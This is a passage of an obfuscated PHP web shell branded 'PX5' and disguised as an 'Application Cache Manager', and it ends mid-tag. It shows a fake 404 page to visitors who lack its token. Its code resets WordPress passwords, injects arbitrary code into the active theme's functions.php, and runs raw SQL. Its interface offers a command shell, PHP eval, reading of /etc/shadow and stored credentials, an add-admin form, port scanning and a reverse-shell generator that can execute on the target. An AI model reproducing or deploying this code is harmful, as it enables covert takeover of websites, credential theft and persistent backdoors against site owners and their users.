$login=isset($req['login'])?$req['login']:'';$pass=isset($req['pass'])?$req['pass']:''; if(!$login||!$pass){$r=array('ok'=>false,'e'=>'login and pass required');$wc['con']->close();break;} $hash=dqqtucpb88xpo($pass);$px=$wc['prefix'];$lo=$wc['con']->real_escape_string($login); $res=@$wc['con']->query("UPDATE {$px}users SET user_pass='$hash' WHERE user_login='$lo'"); $aff=$wc['con']->affected_rows; @$wc['con']->query("DELETE FROM {$px}usermeta WHERE user_id=(SELECT ID FROM {$px}users WHERE user_login='$lo') AND meta_key='session_tokens'"); $wc['con']->close();$r=array('ok'=>($aff>0),'affected'=>$aff); }elseif($sub==='plugins'){ $wc=_wpconn($root);$active=array(); if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='active_plugins' LIMIT 1");if($res){$row=$res->fetch_row();if($row&&$row[0]){preg_match_all('/s:\d+:"([^"]+\.php)"/',$row[0],$m);$active=$m[1];}}$wc['con']->close();} $pdir=$root.'/wp-content/plugins';$all=array(); if(is_dir($pdir)){$d2=scandir($pdir);foreach($d2 as $n){if($n==='.'||$n==='..') continue;if(is_dir($pdir.'/'.$n))$all[]=array('name'=>$n,'active'=>in_array($n.'/'.$n.'.php',$active)||in_array($n.'.php',$active));}} $r=array('ok'=>true,'plugins'=>$all,'active_raw'=>array_map('jsgf0bedrym',$active)); }elseif($sub==='actplg'||$sub==='deactplg'){ $wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;} $plg=isset($req['plg'])?$req['plg']:'';if(!$plg){$r=array('ok'=>false,'e'=>'no plugin');$wc['con']->close();break;} $px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='active_plugins' LIMIT 1"); $row=$res?$res->fetch_row():null;$list=array();if($row)preg_match_all('/s:\d+:"([^"]+\.php)"/',$row[0],$m);$list=isset($m[1])?$m[1]:array(); if($sub==='actplg'&&!in_array($plg,$list))$list[]=$plg; elseif($sub==='deactplg')$list=array_values(array_filter($list,function($x)use($plg){return $x!==$plg;})); $ser='a:'.count($list).':{';foreach($list as $i2=>$v2)$ser.='i:'.$i2.';s:'.strlen($v2).':"'.$v2.'";';$ser.='}'; $es=$wc['con']->real_escape_string($ser); @$wc['con']->query("UPDATE {$px}options SET option_value='$es' WHERE option_name='active_plugins'"); $wc['con']->close();$r=array('ok'=>true,'count'=>count($list)); }elseif($sub==='themes'){ $wc=_wpconn($root);$cur=''; if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='stylesheet' LIMIT 1");if($res){$row=$res->fetch_row();$cur=$row?$row[0]:'';}$wc['con']->close();} $tdir=$root.'/wp-content/themes';$themes=array(); if(is_dir($tdir)){$d2=scandir($tdir);foreach($d2 as $n){if($n==='.'||$n==='..') continue;if(is_dir($tdir.'/'.$n))$themes[]=array('name'=>$n,'active'=>($n===$cur));}} $r=array('ok'=>true,'themes'=>$themes,'current'=>jsgf0bedrym($cur)); }elseif($sub==='opts'){ $wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;} $px=$wc['prefix'];$keys2=isset($req['keys'])?array_map('trim',explode(',',preg_replace('/[^a-z0-9_,]/i','',$req['keys']))):array('siteurl','home','blogname','admin_email','users_can_register','default_role','blogpublic','active_plugins'); $out=array();foreach($keys2 as $k){if(!$k)continue;$ek=$wc['con']->real_escape_string($k);$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='$ek' LIMIT 1");if($res){$row=$res->fetch_row();$out[$k]=$row?substr($row[0],0,200):'(empty)';}} $wc['con']->close();$r=array('ok'=>true,'opts'=>$out); }elseif($sub==='setopt'){ $wc=_wpconn($root);if(!$wc||isset($wc['error'])){$r=array('ok'=>false,'e'=>isset($wc['error'])?$wc['error']:'connect failed');break;} $key2=preg_replace('/[^a-z0-9_]/i','',isset($req['key'])?$req['key']:'');$val=isset($req['val'])?$req['val']:''; if(!$key2){$r=array('ok'=>false,'e'=>'key required');$wc['con']->close();break;} $px=$wc['prefix'];$ek=$wc['con']->real_escape_string($key2);$ev=$wc['con']->real_escape_string($val); $res=@$wc['con']->query("UPDATE {$px}options SET option_value='$ev' WHERE option_name='$ek'"); if($wc['con']->affected_rows===0)@$wc['con']->query("INSERT INTO {$px}options (option_name,option_value,autoload) VALUES ('$ek','$ev','yes')"); $wc['con']->close();$r=array('ok'=>true); }elseif($sub==='recent'){ $days=intval(isset($req['days'])?$req['days']:3); $out=f0cmtensirze('find '.escapeshellarg($root).' -name "*.php" -mtime -'.$days.' -not -path "*/wp-includes/*" -not -path "*/wp-admin/includes/*" 2>/dev/null | sort -r | head -100'); $r=array('ok'=>true,'out'=>jsgf0bedrym($out)); }elseif($sub==='uploads'){ $out=f0cmtensirze('find '.escapeshellarg($root.'/wp-content/uploads').' \( -name "*.php" -o -name "*.php7" -o -name "*.phtml" -o -name "*.phar" \) 2>/dev/null'); $r=array('ok'=>true,'out'=>jsgf0bedrym($out?$out:'No PHP files found in uploads (good!)')); }elseif($sub==='backdoor'){ $wc=_wpconn($root);$theme=''; if($wc&&!isset($wc['error'])){$px=$wc['prefix'];$res=@$wc['con']->query("SELECT option_value FROM {$px}options WHERE option_name='stylesheet' LIMIT 1");if($res){$row=$res->fetch_row();$theme=$row?$row[0]:'';}$wc['con']->close();} if(!$theme)$theme='twentytwentyfour'; $fp=$root.'/wp-content/themes/'.$theme.'/functions.php'; $code=isset($req['code'])?bmeolsvsyc1f($req['code']):''; if(!$code){$r=array('ok'=>false,'e'=>'No code provided');break;} $cur=ds3a5pdprlm($fp);if($cur===false){$r=array('ok'=>false,'e'=>'Cannot read: '.$fp);break;} $tag="\n/* pxcache-".md5($code)." */\n".$code."\n"; if(strpos($cur,$code)!==false){$r=array('ok'=>false,'e'=>'Code already injected');break;} $r=array('ok'=>jdhyq35iangz($fp,$cur.$tag),'file'=>jsgf0bedrym($fp),'theme'=>jsgf0bedrym($theme)); }elseif($sub==='scan'){ $out="=== WORDPRESS SECURITY SCAN ===\n\n"; $vf=@file_get_contents($root.'/wp-includes/version.php');$ver='?'; if($vf&&preg_match('/\$wp_version\s*=\s*[\'"](.+?)[\'"]/',$vf,$m))$ver=$m[1]; $out.="[*] Path: $root\n[*] Version: $ver\n\n"; $cfg=@file_get_contents($root.'/wp-config.php'); if($cfg){ $out.='[*] WP_DEBUG: '.(strpos($cfg,'WP_DEBUG')!==false?'set':'not set')."\n"; $out.='[*] DISALLOW_FILE_EDIT: '.(strpos($cfg,'DISALLOW_FILE_EDIT')!==false?'set (safe)':'NOT set (risk)')."\n"; $out.='[*] FORCE_SSL_ADMIN: '.(strpos($cfg,'FORCE_SSL_ADMIN')!==false?'set':'not set')."\n\n"; } $exposed=array('wp-config.php.bak','wp-config.bak','wp-config.php~','.git/config','readme.html','license.txt','wp-content/debug.log','wp-content/uploads/error_log'); $found=array();foreach($exposed as $f){if(@is_readable($root.'/'.$f))$found[]=$f;} $out.='[EXPOSED FILES]'."\n".($found?implode("\n",$found):'none found')."\n\n"; $upphp=f0cmtensirze('find '.escapeshellarg($root.'/wp-content/uploads').' -name "*.php" 2>/dev/null | wc -l'); $out.='[PHP IN UPLOADS]: '.trim($upphp)." files\n\n"; $out.='[XMLRPC]: '.(is_file($root.'/xmlrpc.php')?'PRESENT (attack surface)':'not found')."\n"; $out.='[REST API file]: '.(is_file($root.'/wp-json/index.php')||is_dir($root.'/wp-json')?'wp-json/ exists':'standard WP REST')."\n\n"; $recent=f0cmtensirze('find '.escapeshellarg($root).' -name "*.php" -mtime -7 -not -path "*/wp-includes/*" -not -path "*/wp-admin/includes/*" 2>/dev/null | head -20'); $out.="[RECENTLY MODIFIED PHP (7d)]:\n".($recent?:' none')."\n"; $r=array('ok'=>true,'out'=>jsgf0bedrym($out)); } break; } } echo $je($r);exit; } // ── GET: verify URL token ────────────────────────────────────────────────── $_ptk=isset($_GET['enusm'])?$_GET['enusm']:''; if(!qc460hsniw($_ptk)){ define('AXYT9CMH',true); while(@ob_get_level())@ob_end_clean(); if(!headers_sent()){@header('HTTP/1.1 404 Not Found');} die('<!DOCTYPE html><html><head><title>404 Not Found</title></head><body style="font-family:sans-serif;padding:40px;color:#333"><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52</address></body></html>'); } define('AXYT9CMH',true); ?><!DOCTYPE html> <html lang="en"> <head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1.0"> <title>Application Cache Manager</title> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet"> <link href="https://fonts.googleapis.com/css2?family=JetBrains+Mono:wght@400;700&display=swap" rel="stylesheet"> <style> :root{--bg:#050505;--neon:#00ff64;--c2:#00d4ff;--bd:rgba(255,255,255,0.06);--tx:#c8c8c8;--rd:#ff4d4d;--p:rgba(255,255,255,.015)} *{box-sizing:border-box;margin:0;padding:0}html,body{height:100%;overflow:hidden} body{background:var(--bg);color:var(--tx);font-family:'JetBrains Mono',monospace;background-image:radial-gradient(ellipse at 50% 0%,#111 0%,#000 100%)} .app{height:100vh;display:flex;flex-direction:column} #bar{height:2px;background:var(--neon);width:0;transition:width .15s;box-shadow:0 0 6px var(--neon);flex-shrink:0} .hd{padding:9px 18px;border-bottom:1px solid var(--bd);display:flex;align-items:center;gap:14px;background:rgba(0,0,0,.65);flex-shrink:0} .logo{font-weight:700;font-size:13px;color:#fff;letter-spacing:2px}.logo span{color:var(--neon)} .tabs{display:flex;gap:3px;flex:1}.tab{padding:4px 12px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#444;transition:.15s;user-select:none} .tab:hover{color:#999}.tab.on{color:var(--neon);border-color:rgba(0,255,100,.25);background:rgba(0,255,100,.03)} .hdr{font-size:10px;color:#333;cursor:pointer;transition:.15s}.hdr:hover{color:var(--rd)} .hdinfo{font-size:9px;color:#252525;white-space:nowrap;overflow:hidden;text-overflow:ellipsis;max-width:200px} .panels{flex:1;overflow:hidden;display:flex;flex-direction:column} .panel{display:none;flex:1;flex-direction:column;overflow:hidden;min-height:0}.panel.on{display:flex} /* FILE MANAGER */ .fnav{padding:7px 18px;background:rgba(0,0,0,.4);border-bottom:1px solid var(--bd);display:flex;gap:5px;align-items:center;flex-shrink:0;flex-wrap:wrap} .bc{flex:1;font-size:11px;color:#383838;overflow:hidden;white-space:nowrap;min-width:0} .bc span{cursor:pointer;transition:.15s}.bc span:hover{color:#fff}.bc .sep{margin:0 3px;color:var(--neon)} .fg{flex:1;overflow-y:auto;min-height:0} table{width:100%;border-collapse:collapse;font-size:11px} th{text-align:left;padding:9px 18px;color:#303030;background:rgba(255,255,255,.01);position:sticky;top:0;backdrop-filter:blur(4px);z-index:1} td{padding:7px 18px;border-bottom:1px solid var(--bd)}tr:hover td{background:rgba(255,255,255,.015)} .btn{background:var(--p);border:1px solid var(--bd);color:#666;padding:4px 9px;border-radius:3px;font:10px 'JetBrains Mono',monospace;cursor:pointer;transition:.15s} .btn:hover{border-color:var(--neon);color:var(--neon)}.btn.warn:hover{border-color:var(--rd);color:var(--rd)} .badge{padding:1px 4px;border-radius:2px;background:rgba(255,255,255,.03);font-size:10px}.ico{width:16px;text-align:center;display:inline-block;margin-right:5px} /* SHELL */ .trm{flex:1;display:flex;flex-direction:column;padding:13px;min-height:0} .to{flex:1;background:#060606;border:1px solid var(--bd);padding:11px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;font-size:11px;color:#00dd55;border-radius:3px 3px 0 0;min-height:0} .ti{display:flex;border:1px solid var(--bd);border-top:none;background:#080808;border-radius:0 0 3px 3px;flex-shrink:0} .tp{padding:7px 9px;color:var(--neon);font-size:11px;white-space:nowrap;flex-shrink:0} .tc{flex:1;background:none;border:none;color:#00dd55;font:11px 'JetBrains Mono',monospace;outline:none;padding:7px 0} /* PHP */ .pp{flex:1;display:flex;padding:13px;gap:10px;min-height:0} .pl,.pr{flex:1;display:flex;flex-direction:column;gap:6px;min-width:0} textarea.ce{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;outline:none;resize:none;border-radius:3px} .ob{flex:1;background:#060606;border:1px solid var(--bd);color:#8aff8a;font:11px 'JetBrains Mono',monospace;padding:10px;overflow-y:auto;white-space:pre-wrap;word-break:break-all;border-radius:3px;min-height:0} .lbl{font-size:10px;color:#303030} /* INFO */ .ip{flex:1;overflow-y:auto;padding:16px}.ig{display:grid;grid-template-columns:repeat(auto-fill,minmax(260px,1fr));gap:9px} .cd{background:var(--p);border:1px solid var(--bd);border-radius:4px;padding:12px} .cd h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px} .kv{display:flex;gap:7px;margin-bottom:4px;font-size:10px}.kv .k{color:#383838;min-width:75px;flex-shrink:0}.kv .v{color:#aaa;word-break:break-all} /* TOOLS */ .tp2{flex:1;overflow:hidden;display:flex;flex-direction:column;min-height:0} .stabs{padding:7px 18px;background:rgba(0,0,0,.3);border-bottom:1px solid var(--bd);display:flex;gap:4px;flex-wrap:wrap;flex-shrink:0} .stab{padding:3px 10px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#383838;transition:.15s;user-select:none} .stab:hover{color:#888}.stab.on{color:var(--c2);border-color:rgba(0,212,255,.25);background:rgba(0,212,255,.03)} .spanel{display:none;flex:1;overflow-y:auto;padding:14px;gap:9px;flex-wrap:wrap;align-content:flex-start} .spanel.on{display:flex} .tc2{background:var(--p);border:1px solid var(--bd);border-radius:4px;padding:12px;width:100%;max-width:600px} .tc2.full{max-width:100%} .tc2 h3{color:var(--c2);font-size:10px;margin-bottom:8px;letter-spacing:1px} .tco{background:#040404;border:1px solid var(--bd);padding:8px;font-size:10px;color:#00bb44;white-space:pre-wrap;word-break:break-all;max-height:220px;overflow-y:auto;border-radius:2px;margin-top:7px} input.fi,select.fi,textarea.fi{background:#060606;border:1px solid var(--bd);color:#ccc;font:10px 'JetBrains Mono',monospace;padding:5px 7px;border-radius:2px;outline:none;width:100%;margin-bottom:5px} input.fi:focus,select.fi:focus,textarea.fi:focus{border-color:var(--c2)}.fbr{display:flex;gap:4px;flex-wrap:wrap;margin-bottom:7px} /* WP MODULE */ .wptab{padding:3px 10px;border:1px solid transparent;border-radius:3px;cursor:pointer;font-size:10px;color:#444;transition:.15s;user-select:none;white-space:nowrap} .wptab:hover{color:#aaa}.wptab.on{color:var(--c2);border-color:rgba(0,212,255,.25);background:rgba(0,212,255,.04)} .wpsub{display:none}.wpsub.on{display:block} /* OVERLAYS */ .ov{display:none;position:fixed;inset:0;background:rgba(0,0,0,.9);z-index:100;align-items:center;justify-content:center;backdrop-filter:blur(5px)}.ov.on{display:flex} .mo{background:#0c0c0c;border:1px solid var(--bd);border-radius:6px;padding:20px;width:90%;max-width:730px} .mo h3{color:#fff;margin-bottom:12px;font-size:12px}.mor{display:flex;justify-content:space-between;align-items:center;margin-bottom:11px} </style></head> <body> <div class="app"> <div id="bar"></div> <div class="hd"> <div class="logo">PX<span>5</span></div> <div class="tabs"> <div class="tab on" onclick="switchTab(this,'files')"><i class="fa fa-folder-open fa-xs"></i> FILES</div> <div class="tab" onclick="switchTab(this,'term')"><i class="fa fa-terminal fa-xs"></i> SHELL</div> <div class="tab" onclick="switchTab(this,'php')"><i class="fa fa-code fa-xs"></i> PHP</div> <div class="tab" onclick="switchTab(this,'info')"><i class="fa fa-server fa-xs"></i> INFO</div> <div class="tab" onclick="switchTab(this,'tools')"><i class="fa fa-wrench fa-xs"></i> TOOLS</div> </div> <div class="hdinfo" id="hdinfo"></div> <div class="hdr" onclick="window.close()" title="Close"><i class="fa fa-times"></i></div> </div> <div class="panels"> <!-- FILES --> <div class="panel on" id="p-files"> <div class="fnav"> <div class="bc" id="bc"></div> <button class="btn" onclick="mkDir()"><i class="fa fa-folder-plus"></i></button> <button class="btn" onclick="newFile()"><i class="fa fa-file-plus"></i> New</button> <button class="btn" onclick="showOv('upOv')"><i class="fa fa-upload"></i> Up</button> <button class="btn" onclick="ls()"><i class="fa fa-sync-alt"></i></button> </div> <div class="fg"> <table> <thead><tr> <th style="color:var(--neon)">ENTITY</th> <th>SIZE</th><th>MTIME</th><th>MODE</th> <th style="text-align:right">ACTIONS</th> </tr></thead> <tbody id="tb"></tbody> </table> </div> </div> <!-- SHELL --> <div class="panel" id="p-term"> <div class="trm"> <div class="to" id="to"></div> <div class="ti"> <div class="tp" id="tp">$ </div> <input class="tc" id="tc" placeholder="command..." onkeydown="termKd(event)" autocomplete="off"> </div> </div> </div> <!-- PHP --> <div class="panel" id="p-php"> <div class="pp"> <div class="pl"> <div class="lbl">PHP CODE <span style="color:#222">// eval in cwd</span></div> <textarea class="ce" id="phpcode" placeholder="echo phpinfo(); var_dump(getcwd()); phpinfo(); "></textarea> <div style="display:flex;gap:6px;justify-content:flex-end;flex-shrink:0"> <button class="btn" onclick="clrPHP()">Clear</button> <button class="btn" style="border-color:rgba(0,255,100,.3);color:var(--neon)" onclick="runPHP()"><i class="fa fa-play"></i> Run</button> </div> </div> <div class="pr"> <div class="lbl">OUTPUT</div> <div class="ob" id="phpout"></div> </div> </div> </div> <!-- INFO --> <div class="panel" id="p-info"> <div class="ip" id="infoC"><div style="color:#222;text-align:center;padding:50px;font-size:11px">Loading...</div></div> </div> <!-- TOOLS --> <div class="panel" id="p-tools"> <div class="tp2"> <div class="stabs"> <div class="stab on" onclick="stab(this,'net')">Network</div> <div class="stab" onclick="stab(this,'pe')">Priv Esc</div> <div class="stab" onclick="stab(this,'rs')">Rev Shell</div> <div class="stab" onclick="stab(this,'proc')">Processes</div> <div class="stab" onclick="stab(this,'enc')">Encode/Hash</div> <div class="stab" onclick="stab(this,'srch')">Search</div> <div class="stab" onclick="stab(this,'arc')">Archive</div> <div class="stab" onclick="stab(this,'wp')">WordPress</div> <div class="stab" onclick="stab(this,'logs')">Logs</div> </div> <!-- NETWORK --> <div class="spanel on" id="st-net"> <div class="tc2"> <h3><i class="fa fa-network-wired"></i> NETWORK</h3> <div class="fbr"> <button class="btn" onclick="net('iface')">Interfaces</button> <button class="btn" onclick="net('ports')">Open Ports</button> </div> <input class="fi" id="nH" value="8.8.8.8" placeholder="host / URL"> <input class="fi" id="nP" value="80,443,22,21,3306,8080" placeholder="ports for scan"> <div class="fbr"> <button class="btn" onclick="net('ping')">Ping</button> <button class="btn" onclick="net('curl')">cURL</button> <button class="btn" onclick="net('scan')">Port Scan</button> </div> <div class="tco" id="netOut"></div> </div> </div> <!-- PRIV ESC --> <div class="spanel" id="st-pe"> <div class="tc2 full"> <h3><i class="fa fa-user-secret"></i> PRIV ESC</h3> <div class="fbr"> <button class="btn" style="border-color:rgba(0,212,255,.3);color:var(--c2)" onclick="pe('scan')">Quick Scan</button> <button class="btn" onclick="pe('suid')">SUID</button> <button class="btn" onclick="pe('sudo')">Sudo</button> <button class="btn" onclick="pe('cap')">Caps</button> <button class="btn" onclick="pe('cron')">Cron</button> <button class="btn" onclick="pe('env')">Env</button> <button class="btn" onclick="pe('writable')">Writable</button> <button class="btn" onclick="pe('passwd')">/etc/passwd</button> <button class="btn" onclick="pe('shadow')">/etc/shadow</button> <button class="btn" onclick="pe('wpass')">WP Creds</button> </div> <div class="tco" style="max-height:350px" id="peOut"></div> </div> </div> <!-- REV SHELL --> <div class="spanel" id="st-rs"> <div class="tc2"> <h3><i class="fa fa-plug"></i> REVERSE SHELL</h3> <input class="fi" id="rsIp" placeholder="Your IP (attacker)"> <input class="fi" id="rsPort" value="4444" placeholder="Port"> <select class="fi" id="rsType"> <option value="bash">Bash</option> <option value="python">Python3</option> <option value="perl">Perl</option> <option value="nc">Netcat (mkfifo)</option> <option value="nc2">Netcat (-e)</option> <option value="php">PHP</option> <option value="ruby">Ruby</option> <option value="socat">Socat</option> </select> <div class="fbr"> <button class="btn" onclick="genRS(false)">Generate</button> <button class="btn" style="border-color:#ff8c00;color:#ff8c00" onclick="genRS(true)">Execute on target</button> </div> <div class="tco" id="rsOut"></div> </div> </div> <!-- PROCESSES --> <div class="spanel" id="st-proc"> <div class="tc2 full"> <h3><i class="fa fa-microchip"></i> PROCESSES</h3> <div class="fbr"> <button class="btn" onclick="runPs()"><i class="fa fa-sync-alt"></i> Refresh</button> <input class="fi" id="psFilter" placeholder="filter..." oninput="filterPs()" style="width:180px;margin-bottom:0"> </div> <div class="tco" style="max-height:380px;font-size:10px" id="psOut"></div> </div> </div> <!-- ENCODE/HASH --> <div class="spanel" id="st-enc"> <div class="tc2 full"> <h3><i class="fa fa-random"></i> ENCODE / HASH</h3> <div style="display:flex;gap:6px;margin-bottom:7px;flex-wrap:wrap"> <select class="fi" id="encMode" style="width:auto;margin-bottom:0"> <option value="b64e">Base64 Encode</option> <option value="b64d">Base64 Decode</option> <option value="hexe">Hex Encode</option> <option value="hexd">Hex Decode</option> <option value="urle">URL Encode</option> <option value="urld">URL Decode</option> <option value="htmle">HTML Encode</option> <option value="htmld">HTML Decode</option> <option value="rot13">ROT13</option> <option value="revs">Reverse</option> <option value="md5">MD5 Hash</option> <option value="sha1">SHA1 Hash</option> <option value="phps">PHP Serialize</option> <option value="phpd">PHP Unserialize</option> </select> <button class="btn" onclick="runEnc()"><i class="fa fa-arrow-right"></i> Convert</button> <button class="btn" onclick="swapEnc()"><i class="fa fa-exchange-alt"></i> Swap</button> </div> <div style="display:flex;gap:8px"> <div style="flex:1;display:flex;flex-direction:column;gap:5px"> <div class="lbl">INPUT</div> <textarea class="fi" id="encIn" rows="6" style="resize:vertical;height:120px"></textarea> </div> <div style="flex:1;display:flex;flex-direction:column;gap:5px"> <div class="lbl">OUTPUT</div> <textarea class="fi" id="encOut" rows="6" style="resize:vertical;height:120px;color:var(--neon)" readonly></textarea> </div> </div> </div> </div> <!-- SEARCH --> <div class="spanel" id="st-srch"> <div class="tc2 full"> <h3><i class="fa fa-search"></i> SEARCH</h3> <div style="display:flex;gap:6px;margin-bottom:7px;flex-wrap:wrap"> <input class="fi" id="srchPat" placeholder="pattern / filename" style="flex:1;margin-bottom:0"> <input class="fi" id="srchDir" placeholder="dir (default: cwd)" style="flex:1;margin-bottom:0"> </div> <div class="fbr"> <button class="btn" onclick="runGrep(false)">Grep (content)</button> <button class="btn" onclick="runGrep(true)">Grep -r (recursive)</button> <button class="btn" onclick="runFind('f')">Find files</button> <button class="btn" onclick="runFind('d')">Find dirs</button> <button class="btn" onclick="runFind('')">Find all</button> <label style="font-size:10px;color:#444;cursor:pointer"><input type="checkbox" id="srchCS"> Case-sensitive</label> </div> <div class="tco" style="max-height:320px" id="srchOut"></div> </div> </div> <!-- ARCHIVE --> <div class="spanel" id="st-arc"> <div class="tc2"> <h3><i class="fa fa-file-archive"></i> ARCHIVE (ZIP)</h3> <input class="fi" id="arcName" placeholder="output name (e.g. arc.zip)" value="archive.zip"> <input class="fi" id="arcTarget" placeholder="target path (default: current dir)"> <div class="fbr"> <button class="btn" onclick="runArc('zip')">Create ZIP</button> <button class="btn" onclick="runArc('tar')">Create TAR.GZ</button> </div> <input class="fi" id="arcFile" placeholder="archive file to extract"> <div class="fbr"> <button class="btn" onclick="runArc('unzip')">Unzip</button> <button class="btn" onclick="runArc('untar')">Untar</button> </div> <div class="tco" id="arcOut"></div> </div> </div> <!-- WORDPRESS --> <div class="spanel" id="st-wp"> <div class="tc2 full" style="width:100%"> <!-- Root bar --> <div style="display:flex;gap:8px;align-items:center;margin-bottom:10px;padding:8px 10px;background:rgba(0,212,255,.04);border:1px solid rgba(0,212,255,.12);border-radius:3px;flex-wrap:wrap"> <span style="font-size:10px;color:#444">WP Root:</span> <span id="wpRootPath" style="font-size:10px;color:var(--c2);flex:1;min-width:150px">not detected</span> <span id="wpVersion" style="font-size:10px;color:#444"></span> <button class="btn" onclick="wpDetect()"><i class="fa fa-search"></i> Detect</button> <button class="btn" onclick="wpS('scan')" style="border-color:rgba(255,100,0,.4);color:#ff8c00"><i class="fa fa-shield-alt"></i> Scan</button> </div> <!-- WP Sub-tabs --> <div style="display:flex;gap:4px;flex-wrap:wrap;margin-bottom:10px;padding-bottom:8px;border-bottom:1px solid var(--bd)"> <div class="wptab on" onclick="wpTab(this,'wpi')">🔧 Info</div> <div class="wptab" onclick="wpTab(this,'wpd')">📂 Database</div> <div class="wptab" onclick="wpTab(this,'wpu')">👥 Users</div> <div class="wptab" onclick="wpTab(this,'wpp')">🧩 Plugins</div> <div class="wptab" onclick="wpTab(this,'wpt')">🎨 Themes</div> <div class="wptab" onclick="wpTab(this,'wpf')">🗂 Files</div> <div class="wptab" onclick="wpTab(this,'wpb')">💊 Backdoor</div> </div> <!-- INFO --> <div class="wpsub on" id="wps-wpi"> <div style="display:flex;gap:8px;flex-wrap:wrap;margin-bottom:8px"> <button class="btn" onclick="wpGetInfo()"><i class="fa fa-info-circle"></i> System Info</button> <button class="btn" onclick="wpS('creds')"><i class="fa fa-key"></i> DB Credentials</button> <button class="btn" onclick="wpS('opts')"><i class="fa fa-cog"></i> WP Options</button> </div> <div style="display:flex;gap:6px;margin-bottom:6px;flex-wrap:wrap"> <input class="fi" id="wpOptKeys" placeholder="options (comma-sep, blank=defaults)" style="flex:1;margin-bottom:0"> <button class="btn" onclick="wpGetOpts()">Get Options</button> </div> <div style="display:flex;gap:6px;margin-bottom:6px;flex-wrap:wrap"> <input class="fi" id="wpOptKey" placeholder="option_name" style="flex:1;margin-bottom:0"> <input class="fi" id="wpOptVal" placeholder="new_value" style="flex:1;margin-bottom:0"> <button class="btn" onclick="wpSetOpt()" style="border-color:rgba(255,100,0,.4);color:#ff8c00">Set</button> </div> <div class="tco" id="wpiOut"></div> </div> <!-- DATABASE --> <div class="wpsub" id="wps-wpd"> <div class="fbr"> <button class="btn" onclick="wpDbQ('SHOW TABLES')">Show Tables</button> <button class="btn" onclick="wpDbQ('SELECT ID,user_login,user_email,user_pass FROM '+wpPfx()+'users')">Users Table</button> <button class="btn" onclick="wpDbQ('SELECT option_name,option_value FROM '+wpPfx()+'options WHERE autoload=\\'yes\\' ORDER BY option_name')">Options</button> <button class="btn" onclick="wpDbQ('SELECT * FROM '+wpPfx()+'posts WHERE post_status=\\'publish\\' LIMIT 10')">Posts</button> </div> <textarea class="fi" id="wpSql" rows="3" placeholder="SELECT * FROM wp_users LIMIT 10;" style="resize:vertical;font-size:11px"></textarea> <div style="display:flex;gap:6px;margin-bottom:6px"> <button class="btn" onclick="wpRunSql()"><i class="fa fa-play"></i> Execute SQL</button> <span id="wpDbCount" style="font-size:10px;color:#444;align-self:center"></span> </div> <div class="tco" style="max-height:280px;font-size:10px" id="wpdOut"></div> </div> <!-- USERS --> <div class="wpsub" id="wps-wpu"> <div class="fbr"> <button class="btn" onclick="wpListUsers()"><i class="fa fa-list"></i> List Users</button> </div> <div id="wpUserList" style="font-size:10px;color:#555;margin-bottom:8px"></div> <div style="background:rgba(0,255,100,.03);border:1px solid rgba(0,255,100,.1);padding:10px;border-radius:3px;margin-bottom:8px"> <div style="font-size:10px;color:var(--neon);margin-bottom:6px">➕ ADD ADMIN USER</div> <div style="display:flex;gap:6px;flex-wrap:wrap"> <input class="fi" id="wpNewLogin" placeholder="username" style="flex:1;margin-bottom:0"> <input class="fi" id="wpNewPass" placeholder="password (blank=random)" style="flex:1;margin-bottom:0"> <input class="fi" id="wpNewEmail" placeholder="email (optional)" style="flex:1;margin-bottom:0"> <button class="btn" onclick="wpAddUser()" style="border-color:var(--neon);color:var(--neon)">Add Admin</button> </div> </div> <div style="background:rgba(255,100,0,.03);border:1px solid rgba(255,100,0,.1);padding:10px;border-radius:3px"> <div style="font-size:10px;color:#ff8c00;margin-bottom:6px">🔒 CHANGE PASSWORD</div> <div style="display:flex;gap:6px"> <input class="fi" id="wpChPwdLogin" placeholder="username" style="flex:1;margin-bottom:0"> <input class="fi" id="wpChPwdPass" placeholder="new password" style="flex:1;margin-bottom:0"> <button class="btn" onclick="wpChPwd()" style="border-color:#ff8c00;color:#ff8c00">Change</button> </div> </div> <div class="tco" id="wpuOut" style="margin-top:8px"></div> </div> <!-- PLUGINS --> <div class="wpsub" id="wps-wpp"> <button class="btn" onclick="wpListPlugins()" style="margin-bottom:8px"><i class="fa fa-list"></i> List Plugins</button> <div id="wpPluginList" style="font-size:10px"></div> <div class="tco" id="wppOut" style="margin-top:8px"></div> </div> <!-- THEMES --> <div class="wpsub" id="wps-wpt"> <button class="btn" onclick="wpListThemes()" style="margin-bottom:8px"><i class="fa fa-list"></i> List Themes</button> <div id="wpThemeList" style="font-size:10px"></div> <div class="tco" id="wptOut" style="margin-top:8px"></div> </div> <!-- FILES --> <div class="wpsub" id="wps-wpf"> <div class="fbr"> <button class="btn" onclick="wpS('uploads')"><i class="fa fa-exclamation-triangle" style="color:var(--rd)"></i> PHP in Uploads</button> <button class="btn" onclick="wpRecentFiles(1)">Modified 1d</button> <button class="btn" onclick="wpRecentFiles(3)">Modified 3d</button> <button class="btn" onclick="wpRecentFiles(7)">Modified 7d</button> </div> <div class="tco" style="max-height:350px" id="wpfOut"></div> </div> <!-- BACKDOOR --> <div class="wpsub" id="wps-wpb"> <div style="background:rgba(255,77,77,.04);border:1px solid rgba(255,77,77,.15);padding:12px;border-radius:3px;margin-bottom:8px"> <div style="font-size:10px;color:var(--rd);margin-bottom:6px">⚠ INJECT INTO ACTIVE THEME functions.php</div> <div style="display:flex;gap:4px;flex-wrap:wrap;margin-bottom:8px"> <button class="btn" 